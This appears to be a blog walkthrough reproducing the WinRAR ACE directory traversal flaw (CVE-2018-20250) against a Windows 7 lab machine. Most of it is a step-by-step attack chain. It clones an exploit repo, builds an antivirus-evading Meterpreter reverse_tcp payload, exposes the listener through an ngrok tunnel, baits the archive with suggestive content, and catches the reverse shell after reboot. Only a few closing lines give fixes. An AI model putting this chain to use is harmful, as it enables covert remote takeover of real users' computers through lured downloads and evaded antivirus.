WinRAR Directory Traversal Vulnerability - CVE-2018-20250 Reproduction

Cause#

Content from the WinRAR China download page

Nadav Grossman from Check Point Software Technologies introduced a security vulnerability in the UNACEV2.DLL library. This vulnerability allows the creation of files in any folder inside or outside the target folder when decompressing ACE archives. WinRAR uses this third-party library to decompress ACE archives. UNACEV2.DLL has not been updated since 2005 and we do not have access to its source code. Therefore, we decided to abandon support for the ACE archive format to protect the security of WinRAR users.

Report source: Extracting a 19 Year Old Code Execution from WinRAR

Affected versions:

WinRAR < 5.70 Beta 1
Bandizip <= 6.2.0.0
Haozip (2345 Compression) <= 5.9.8.10907
360 Compression <= 4.0.0.1170

As soon as the vulnerability was announced, major security companies immediately began analyzing the vulnerability and malicious samples:

Flag: When I saw that the result of exploiting the vulnerability was adding files to the startup items, I knew that this vulnerability had a high chance of being intercepted by major security guards. But let's put that aside for now.

Analysis of Vulnerability Cause#

As a newbie, all I can do is read the analysis of the experts and after reading enough, try to analyze it myself.

Most of the articles analyzing the vulnerability reproduce the content of the original report.

Vulnerability Reproduction#

The purpose of this dynamic link library is to handle ACE format files. During the decompression process, there is a directory traversal vulnerability that allows writing files to the startup items, resulting in code execution.

Reference articles:

Environment Preparation#

Attacker machine: Kali 2019.1 with internet access
Target machine: Win7 SP1 with internet access

Download WinRAR v5.6 from: http://www.zdfans.com/html/5737.html

I downloaded a Chinese version, it doesn't matter, as long as the version is correct:

We can see that the UNACEV2.dll file that causes the vulnerability is still there, so it's OK:

Download WinRAR Exploit#

git clone https://github.com/WyAtu/CVE-2018-20250.git

For students with slow internet speed, you can use the one I cloned to gitee:

git clone https://gitee.com/soapffz/CVE-2018-20250.git

Start ngrok tunnel#

Of course, you don't need this step if you are attacking from the internal network.

Open the website https://www.ngrok.cc, if you don't have an account, register one. Log in, Tunnel Management on the left -> Open Tunnel -> Select the free Hong Kong Ngrok server in the lower right corner:

Set the ngrok tunnel protocol to TCP, change the internal IP to your own KaliLinux internal IP, and the internal port can be filled in arbitrarily as long as it doesn't conflict.

Then you will find that no matter what port you switch to, it will become like this:

Obviously, this is a marketing strategy, so I was fooled and spent 10 yuan to open a VIP server:

Download the 64-bit version client of Ngrok to your local machine
Start the tunnel:

./sunny clientid your_tunnel_ID

Configure payload#

Open Metasploit, select the evasion module

Generate the payload:

evasion/windows/windows_defender_exe is a new module in msf5. If your Kali version is low, you can just install and update Metasploit:

msfconsole
use evasion/windows/windows_defender_exe (select msf5 evasion module)
show info (display module information)
set filename WinRarPayloadTest.exe (set the name of the payload)
set payload windows/meterpreter/reverse_tcp (set the type of payload)
set lhost your_domain (set the online address, fill in the address mapped out by Ngrok, excluding the port number and protocol type)
set lport your_port (set the listening port, fill in the port mapped out by Ngrok)
run (generate payload)

The path address of the payload: /root/.msf4/local/WinRarPayload.exe

Copy the generated exe program to the previously downloaded exp folder directory:

Modify the rar_filename and evil_filename values in exp.py:

python exp.py will automatically generate a malicious compressed package in the root directory:

Okay, an error occurred, close Kali, go to sleep, just kidding~

The author mentioned this issue in Read.me: https://gitee.com/soapffz/CVE-2018-20250/blob/master/README.md

If your python environment variable is configured as python2, python3, etc., then find the get_right_hdr_crc function in the exp.py file and change the line of code that opens acefile.py to:

p = os.popen('py -3 acefile.py --headers %s'%(filename))

Change it to your python opening method, for example:

p = os.popen('python3 acefile.py --headers %s'%(filename))

Of course, if you can execute the py -3 command in your environment, you don't need to change it.

The malicious compressed package has been successfully generated. Now, put some photos, videos (you know what I mean) inside, and it becomes an attractive compressed package.

Copy the generated compressed file to the www directory and start an Apache2 service.

Target machine online and listening#

Download and decompress this malicious compressed package on the Windows7 target machine:

You will find our malicious payload.exe in the startup directory of win7:

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Start the Metasploit remote listener to handle the online request:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost Kali's_ip
set lport the_internal_port_set_when_applying_ngrok
run

Make sure ngrok is running in the background, then restart Win7, and after a while, you will see Win7 online in Kali:

Enter the shell to operate on Win7:

You have successfully gained control of a perfect zombie, and now it's time to eat chicken!!!

Vulnerability Fix#

Upgrade to version 5.70.2.0
Delete the UNACEV2.dll file in the installation directory
Be careful when receiving sensitive compressed packages, don't let curiosity harm you!